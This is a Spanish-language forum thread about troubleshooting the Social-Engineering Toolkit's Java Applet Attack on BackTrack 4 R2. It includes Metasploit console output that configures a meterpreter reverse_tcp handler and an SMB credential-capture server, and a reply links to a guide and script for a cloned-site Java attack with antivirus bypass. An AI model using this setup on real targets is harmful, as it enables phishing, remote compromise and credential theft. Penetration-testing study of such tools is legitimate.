Pongo este post aqui por que el tema se relaciona con el uso del SET. El problema es que estoy usando el SET desde el livecd de Backtrack 4 R2 y en el momento de crear un payload para el Java Applet Attack me sale lo siguiente:



=[ metasploit v3.6.0-dev [core:3.6 api:1.0]
+ -- --=[ 642 exploits - 324 auxiliary
+ -- --=[ 216 payloads - 27 encoders - 8 nops
=[ svn r11608 updated today (2011.01.20)

resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j

Exploit running as background job.
resource (src/program_junk/meta_config)> use server/capture/smb
resource (src/program_junk/meta_config)> exploit -j

Auxiliary module running as background job

Started reverse handler on 0.0.0.0:443

Starting the payload handler...
msf auxiliary(smb) >

Server started.


Es decir, el LHOST y en "Started reverse handler on" me aparece con la ip 0.0.0.0 en vez de la ip que estoy usando en el momento. Mi duda es, como hacer para que en ese LHOST me aparezca la ip que estoy usando. Ya que esto no permite la conexion inversa.

Repito que estoy usandolo desde el Backtrack 4 R2 en modo LiveCD.

Espero puedan ayudarme y gracias por sus respuestas

No te preocupes por eso, si redireccionas las peticiones de otro host a tu IP local el servidor se ejecuta.

Casualmente acabo de crear un post con este tema, junto con un script para automatizarlo.

Foro DragonJar
http://comunidad.dragonjar.org/f152/clone-site-java-attack-bypass-av-11210/

Mi Blog
Breaking The Code: Realizando Clone Site JAVA Attack Bypass AV (http://btcode.blogspot.com/2011/01/realizando-clone-site-java-attack.html)

Un saludo.